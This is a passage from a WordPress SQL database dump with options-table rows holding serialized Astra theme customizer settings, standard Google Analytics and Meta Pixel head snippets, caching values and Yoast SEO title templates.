here.";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[footer-html-1color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-html-1-link-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-html-1link-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[footer-html-1link-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-fb-html-1-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-fb-html-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:39:"astra-settings[footer-html-1-alignment]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:6:"center";s:6:"tablet";s:6:"center";s:6:"mobile";s:6:"center";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[section-fb-html-2-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[font-size-section-fb-html-2]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"section-fb-html-2-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:29:"astra-settings[footer-html-2]";a:4:{s:7:"default";s:22:"Insert HTML text here.";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[footer-html-2color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-html-2-link-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-html-2link-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[footer-html-2link-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-fb-html-2-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-fb-html-2-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:39:"astra-settings[footer-html-2-alignment]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:6:"center";s:6:"tablet";s:6:"center";s:6:"mobile";s:6:"center";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-footer-widget-1-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:41:"astra-settings[footer-widget-alignment-1]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:4:"left";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:75:"astra-settings[astra-sidebar-widgets-footer-widget-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-footer-widget-2-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:41:"astra-settings[footer-widget-alignment-2]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:4:"left";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:75:"astra-settings[astra-sidebar-widgets-footer-widget-2-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-footer-widget-3-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:41:"astra-settings[footer-widget-alignment-3]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:4:"left";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:75:"astra-settings[astra-sidebar-widgets-footer-widget-3-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-footer-widget-4-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:41:"astra-settings[footer-widget-alignment-4]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:4:"left";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:75:"astra-settings[astra-sidebar-widgets-footer-widget-4-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}}s:8:"partials";a:35:{s:37:"astra-settings[different-retina-logo]";a:4:{s:8:"selector";s:14:".site-branding";s:15:"render_callback";s:35:"Astra_Builder_Header::site_identity";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:38:"astra-settings[ast-header-retina-logo]";a:4:{s:8:"selector";s:14:".site-branding";s:15:"render_callback";s:35:"Astra_Builder_Header::site_identity";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:37:"astra-settings[different-mobile-logo]";a:4:{s:8:"selector";s:14:".site-branding";s:15:"render_callback";s:35:"Astra_Builder_Header::site_identity";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:33:"astra-settings[logo-title-inline]";a:4:{s:8:"selector";s:14:".site-branding";s:15:"render_callback";s:35:"Astra_Builder_Header::site_identity";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:35:"astra-settings[related-posts-title]";a:4:{s:8:"selector";s:57:".ast-related-posts-title-section .ast-related-posts-title";s:15:"render_callback";a:2:{i:0;s:26:"Astra_Related_Posts_Loader";i:1;s:26:"render_related_posts_title";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:39:"astra-settings[transparent-header-logo]";a:4:{s:8:"selector";s:64:".ast-replace-site-logo-transparent .site-branding .site-logo-img";s:15:"render_callback";s:0:"";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:35:"astra-settings[breadcrumb-position]";a:4:{s:8:"selector";s:54:".ast-breadcrumbs-wrapper .ast-breadcrumbs .trail-items";s:15:"render_callback";s:0:"";s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:36:"astra-settings[header-desktop-items]";a:4:{s:8:"selector";s:9:"#masthead";s:15:"render_callback";a:2:{i:0;O:20:"Astra_Builder_Header":0:{}i:1;s:21:"header_builder_markup";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:35:"astra-settings[header-mobile-items]";a:4:{s:8:"selector";s:9:"#masthead";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:21:"header_builder_markup";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:41:"astra-settings[header-mobile-popup-items]";a:4:{s:8:"selector";s:25:"#ast-mobile-popup-wrapper";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:12:"mobile_popup";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:36:"astra-settings[footer-desktop-items]";a:4:{s:8:"selector";s:12:".site-footer";s:15:"render_callback";a:2:{i:0;O:20:"Astra_Builder_Footer":0:{}i:1;s:13:"footer_markup";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:35:"astra-settings[header-trigger-icon]";a:4:{s:8:"selector";s:16:".ast-button-wrap";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:21:"render_mobile_trigger";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:46:"astra-settings[mobile-header-toggle-btn-style]";a:4:{s:8:"selector";s:16:".ast-button-wrap";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:21:"render_mobile_trigger";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:40:"astra-settings[mobile-header-menu-label]";a:4:{s:8:"selector";s:16:".ast-button-wrap";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:21:"render_mobile_trigger";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:35:"astra-settings[header-button1-text]";a:4:{s:8:"selector";s:20:".ast-header-button-1";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:8:"button_1";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:0;}s:42:"astra-settings[header-button1-link-option]";a:4:{s:8:"selector";s:20:".ast-header-button-1";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:8:"button_1";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:29:"astra-settings[header-html-1]";a:4:{s:8:"selector";s:18:".ast-header-html-1";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:13:"header_html_1";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:0;}s:29:"astra-settings[header-html-2]";a:4:{s:8:"selector";s:18:".ast-header-html-2";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:13:"header_html_2";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:0;}s:42:"astra-settings[header-account-login-style]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:45:"astra-settings[header-account-logged-in-text]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:41:"astra-settings[header-account-login-link]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:43:"astra-settings[header-account-logout-style]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:45:"astra-settings[header-account-logout-preview]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:46:"astra-settings[header-account-logged-out-text]";a:4:{s:8:"selector";s:19:".ast-header-account";s:15:"render_callback";a:2:{i:0;s:27:"Astra_Builder_UI_Controller";i:1;s:14:"render_account";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:1;}s:37:"astra-settings[header-social-icons-1]";a:4:{s:8:"selector";s:25:".ast-header-social-1-wrap";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:15:"header_social_1";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:0;}s:44:"astra-settings[header-social-1-label-toggle]";a:4:{s:8:"selector";s:25:".ast-header-social-1-wrap";s:15:"render_callback";a:2:{i:0;r:6582;i:1;s:15:"header_social_1";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:0;}s:33:"astra-settings[hba-footer-column]";a:4:{s:8:"selector";s:23:".site-above-footer-wrap";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:12:"above_footer";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:33:"astra-settings[hbb-footer-column]";a:4:{s:8:"selector";s:23:".site-below-footer-wrap";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:12:"below_footer";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:39:"astra-settings[footer-copyright-editor]";a:4:{s:8:"selector";s:21:".ast-footer-copyright";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:16:"footer_copyright";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:34:"astra-settings[footer-menu-layout]";a:4:{s:8:"selector";s:59:".footer-widget-area[data-section="section-footer-menu"] nav";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:11:"footer_menu";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:1;}s:37:"astra-settings[footer-social-icons-1]";a:4:{s:8:"selector";s:25:".ast-footer-social-1-wrap";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:15:"footer_social_1";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:0;}s:44:"astra-settings[footer-social-1-label-toggle]";a:4:{s:8:"selector";s:25:".ast-footer-social-1-wrap";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:15:"footer_social_1";}s:18:"containerInclusive";b:1;s:15:"fallbackRefresh";b:0;}s:32:"astra-settings[hb-footer-column]";a:4:{s:8:"selector";s:25:".site-primary-footer-wrap";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:14:"primary_footer";}s:18:"containerInclusive";b:0;s:15:"fallbackRefresh";b:1;}s:29:"astra-settings[footer-html-1]";a:4:{s:8:"selector";s:18:".ast-footer-html-1";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:13:"footer_html_1";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:0;}s:29:"astra-settings[footer-html-2]";a:4:{s:8:"selector";s:18:".ast-footer-html-2";s:15:"render_callback";a:2:{i:0;r:6603;i:1;s:13:"footer_html_2";}s:18:"containerInclusive";s:0:"";s:15:"fallbackRefresh";b:0;}}}', 'no');
INSERT INTO `wpou_options` VALUES
(45580, 'db_upgraded', '', 'yes'),
(172, 'astra-settings', 'a:38:{s:18:"theme-auto-version";s:6:"4.6.11";s:12:"hook-wp-head";s:952:"<!-- Google tag (gtag.js) -->\n<script async src="https://www.googletagmanager.com/gtag/js?id=G-NH29SB2CMZ"></script>\n<script>\n  window.dataLayer = window.dataLayer || [];\n  function gtag(){dataLayer.push(arguments);}\n  gtag(''js'', new Date());\n\n  gtag(''config'', ''G-NH29SB2CMZ'');\n</script>\n<!-- Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version=''2.0'';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,''script'',\n''https://connect.facebook.net/en_US/fbevents.js'');\nfbq(''init'', ''3250314051927125'');\nfbq(''track'', ''PageView'');\n</script>\n<noscript><img height="1" width="1" style="display:none"\nsrc="https://www.facebook.com/tr?id=3250314051927125&ev=PageView&noscript=1"\n/></noscript>\n<!-- End Meta Pixel Code -->";s:23:"v4-1-4-update-migration";b:1;s:19:"button-preset-style";s:0:"";s:20:"theme-button-padding";a:6:{s:7:"desktop";a:4:{s:3:"top";i:15;s:5:"right";i:30;s:6:"bottom";i:15;s:4:"left";i:30;}s:6:"tablet";a:4:{s:3:"top";i:14;s:5:"right";i:28;s:6:"bottom";i:14;s:4:"left";i:28;}s:6:"mobile";a:4:{s:3:"top";i:12;s:5:"right";i:24;s:6:"bottom";i:12;s:4:"left";i:24;}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:37:"theme-button-border-group-border-size";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:20:"button-radius-fields";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:27:"list-block-vertical-spacing";b:0;s:25:"fullwidth_sidebar_support";b:0;s:23:"v4-2-0-update-migration";b:1;s:29:"v4-2-2-core-form-btns-styling";b:0;s:22:"v4-4-0-backward-option";b:0;s:30:"secondary-button-radius-fields";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:64:"ast-dynamic-single-post-article-featured-image-position-layout-1";s:4:"none";s:64:"ast-dynamic-single-post-article-featured-image-position-layout-2";s:4:"none";s:57:"ast-dynamic-single-post-article-featured-image-ratio-type";s:7:"default";s:64:"ast-dynamic-single-page-article-featured-image-position-layout-1";s:4:"none";s:64:"ast-dynamic-single-page-article-featured-image-position-layout-2";s:4:"none";s:57:"ast-dynamic-single-page-article-featured-image-ratio-type";s:7:"default";s:22:"is_theme_queue_running";b:0;s:22:"v4-5-0-backward-option";b:0;s:26:"scndry-btn-default-padding";b:0;s:22:"v4-6-0-backward-option";b:0;s:19:"blog-post-structure";a:5:{i:0;s:5:"image";i:1;s:5:"title";i:2;s:10:"title-meta";i:3;s:7:"excerpt";i:4;s:9:"read-more";}s:28:"single-content-images-shadow";b:0;s:21:"ast-font-style-update";b:0;s:22:"v4-6-2-backward-option";b:0;s:33:"ast-dynamic-single-page-structure";a:1:{i:0;s:29:"ast-dynamic-single-page-title";}s:20:"btn-stylings-upgrade";b:0;s:24:"elementor-headings-style";b:0;s:33:"elementor-container-padding-style";b:0;s:14:"font-extras-h1";a:2:{s:11:"line-height";s:3:"1.4";s:16:"line-height-unit";s:2:"em";}s:14:"font-extras-h2";a:2:{s:11:"line-height";s:3:"1.3";s:16:"line-height-unit";s:2:"em";}s:14:"font-extras-h3";a:2:{s:11:"line-height";s:3:"1.3";s:16:"line-height-unit";s:2:"em";}s:14:"font-extras-h4";a:2:{s:11:"line-height";s:3:"1.2";s:16:"line-height-unit";s:2:"em";}s:14:"font-extras-h5";a:2:{s:11:"line-height";s:3:"1.2";s:16:"line-height-unit";s:2:"em";}s:14:"font-extras-h6";a:2:{s:11:"line-height";s:4:"1.25";s:16:"line-height-unit";s:2:"em";}s:34:"global-headings-line-height-update";b:1;}', 'yes'),
(180, 'theme_mods_astra-child', 'a:3:{i:0;b:0;s:18:"nav_menu_locations";a:2:{s:7:"primary";i:3;s:11:"mobile_menu";i:3;}s:18:"custom_css_post_id";i:-1;}', 'yes'),
(181, 'recently_activated', 'a:2:{s:21:"yop-poll/yop_poll.php";i:1689796438;s:27:"redirection/redirection.php";i:1689755723;}', 'yes'),
(223, 'wp_super_cache_index_detected', '3', 'no'),
(225, 'wpsupercache_start', '1681117247', 'yes'),
(226, 'wpsupercache_count', '0', 'yes'),
(227, 'wpsupercache_gc_time', '1712770108', 'yes'),
(188, 'wpseo_titles', 'a:110:{s:17:"forcerewritetitle";b:0;s:9:"separator";s:7:"sc-dash";s:16:"title-home-wpseo";s:42:"%%sitename%% %%page%% %%sep%% %%sitedesc%%";s:18:"title-author-wpseo";s:41:"%%name%%, Author at %%sitename%% %%page%%";s:19:"title-archive-wpseo";s:38:"%%date%% %%page%% %%sep%% %%sitename%%";s:18:"title-search-wpseo";s:63:"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%";s:15:"title-404-wpseo";s:35:"Page not found %%sep%% %%sitename%%";s:25:"social-title-author-wpseo";s:8:"%%name%%";s:26:"social-title-archive-wpseo";s:8:"%%date%%";s:31:"social-description-author-wpseo";s:0:"";s:32:"social-description-archive-wpseo";s:0:"";s:29:"social-image-url-author-wpseo";s:0:"";s:30:"social-image-url-archive-wpseo";s:0:"";s:28:"social-image-id-author-wpseo";i:0;s:29:"social-image-id-archive-wpseo";i:0;s:19:"metadesc-home-wpseo";s:0:"";s:21:"metadesc-author-wpseo";s:0:"";s:22:"metadesc-archive-wpseo";s:0:"";s:9:"rssbefore";s:0:"";s:8:"rssafter";s:53:"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.";s:20:"noindex-author-wpseo";b:0;s:28:"noindex-author-noposts-wpseo";b:1;s:21:"noindex-archive-wpseo";b:1;s:14:"disable-author";b:0;s:12:"disable-date";b:0;s:19:"disable-post_format";b:0;s:18:"disable-attachment";b:1;s:20:"breadcrumbs-404crumb";s:25:"Error 404: Page not found";s:29:"breadcrumbs-display-blog-page";b:1;s:20:"breadcrumbs-boldlast";b:0;s:25:"breadcrumbs-archiveprefix";s:12:"Archives for";s:18:"breadcrumbs-enable";b:1;s:16:"breadcrumbs-home";s:4:"Home";s:18:"breadcrumbs-prefix";s:0:"";s:24:"breadcrumbs-searchprefix";s:16:"You searched for";s:15:"breadcrumbs-sep";s:2:"Â»";s:12:"website_name";s:0:"";s:11:"person_name";s:0:"";s:11:"person_logo";s:0:"";s:22:"alternate_website_name";s:0:"";s:12:"company_logo";s:0:"";s:12:"company_name";s:0:"";s:22:"company_alternate_name";s:0:"";s:17:"company_or_person";s:7:"company";s:25:"company_or_person_user_id";b:0;s:17:"stripcategorybase";b:0;s:26:"open_graph_frontpage_title";s:12:"%%sitename%%";s:25:"open_graph_frontpage_desc";s:0:"";s:26:"open_graph_frontpage_image";s:0:"";s:10:"title-post";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:13:"metadesc-post";s:0:"";s:12:"noindex-post";b:0;s:23:"display-metabox-pt-post";b:1;s:23:"post_types-post-maintax";i:0;s:21:"schema-page-type-post";s:7:"WebPage";s:24:"schema-article-type-post";s:7:"Article";s:17:"social-title-post";s:9:"%%title%%";s:23:"social-description-post";s:0:"";s:21:"social-image-url-post";s:0:"";s:20:"social-image-id-post";i:0;s:10:"title-page";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:13:"metadesc-page";s:0:"";s:12:"noindex-page";b:0;s:23:"display-metabox-pt-page";b:1;s:23:"post_types-page-maintax";i:0;s:21:"schema-page-type-page";s:7:"WebPage";s:24:"schema-article-type-page";s:4:"None";s:17:"social-title-page";s:9:"%%title%%";s:23:"social-description-page";s:0:"";s:21:"social-image-url-page";s:0:"";s:20:"social-image-id-page";i:0;s:16:"title-attachment";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:19:"metadesc-attachment";s:0:"";s:18:"noindex-attachment";b:0;s:29:"display-metabox-pt-attachment";b:1;s:29:"post_types-attachment-maintax";i:0;s:27:"schema-page-type-attachment";s:7:"WebPage";s:30:"schema-article-type-attachment";s:4:"None";s:18:"title-tax-category";s:53:"%%term_title%% Archives %%page%% %%sep%% %%sitename%%";s:21:"metadesc-tax-category";s:0:"";s:28:"display-metabox-tax-category";b:1;s:20:"noindex-tax-category";b:0;s:25:"social-title-tax-category";s:23:"%%term_title%% Archives";s:31:"social-description-tax-category";s:0:"";s:29:"social-image-url-tax-category";s:0:"";s:28:"social-image-id-tax-category";i:0;s:26:"taxonomy-category-ptparent";i:0;s:18:"title-tax-post_tag";s:53:"%%term_title%% Archives %%page%% %%sep%% %%sitename%%";s:21:"metadesc-tax-post_tag";s:0:"";s:28:"display-metabox-tax-post_tag";b:1;s:20:"noindex-tax-post_tag";b:0;s:25:"social-title-tax-post_tag";s:23:"%%term_title%% Archives";s:31:"social-description-tax-post_tag";s:0:"";s:29:"social-image-url-tax-post_tag";s:0:"";s:28:"social-image-id-tax-post_tag";i:0;s:26:"taxonomy-post_tag-ptparent";i:0;s:21:"title-tax-post_format";s:53:"%%term_title%% Archives %%page%% %%sep%% %%sitename%%";s:24:"metadesc-tax-post_format";s:0:"";s:31:"display-metabox-tax-post_format";b:1;s:23:"noindex-tax-post_format";b:1;s:28:"social-title-tax-post_format";s:23:"%%term_title%% Archives";s:34:"social-description-tax-post_format";s:0:"";s:32:"social-image-url-tax-post_format";s:0:"";s:31:"social-image-id-tax-post_format";i:0;s:29:"taxonomy-post_format-ptparent";i:0;s:14:"person_logo_id";i:0;s:15:"company_logo_id";i:0;s:17:"company_logo_meta";b:0;s:16:"person_logo_meta";b:0;s:29:"open_graph_frontpage_image_id";i:0;}', 'yes'),
